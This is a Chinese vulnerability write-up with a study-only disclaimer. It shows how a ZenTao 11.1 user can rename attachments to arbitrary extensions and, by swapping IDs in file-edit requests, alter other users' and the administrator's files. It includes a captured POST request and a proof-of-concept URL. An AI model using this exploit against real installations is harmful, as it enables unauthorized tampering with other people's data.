禅道11.1任意文件操作+越权

一、任意文件操作:

管理员随便发布一个项目,然后管理员到后台分配一个会员:
http://127.0.0.1:1236/company-browse.html

登录这个novy的帐号,去提BUG(评论):
http://127.0.0.1:1236/bug-browse-1.html

随便上传一个允许上传的附件,保存然后点重命名:

然后抓包获取数据包,把后缀名改了rar

刷新一遍页面即可看到修改后的文件

http://127.0.0.1:1236/file-edit-1.html此处的请求为评论的顺序,想改哪个就把请求改成对应顺序id,
比如:改成http://127.0.0.1:1236/file-edit-2.html即表示改第二个附件:

二、越权

登陆后先重命名自己的附件,抓包获取链接,然后把id改为其他人的附件id即可:

1
2
3
4
5
6
7
8
9
10
POST /file-edit-4.html HTTP/1.1 
Host: 127.0.0.1:1236
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:1236/file-edit-2.html //此处为越权链接
Content-Type: application/x-www-form-urlencoded Content-Length: 24
Connection: close
Cookie:; device=desktop; theme=default; lastProduct=1; preBranch=0; preProductID=1; checkedItem=; from=product; docFilesViewType=card; zentaosid=ikitlp7bger294dpts96l9v754; windowWidth=400; windowHeight=151; qaBugOrder=id_desc Upgrade-Insecure-Requests: 1


fileName=1&extension=rar //此处为文件操作

修改管理员文件:

漏洞POC

1
http://127.0.0.1:1236/file-edit-2.html (http://localhost/file-edit-ID.html)

声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.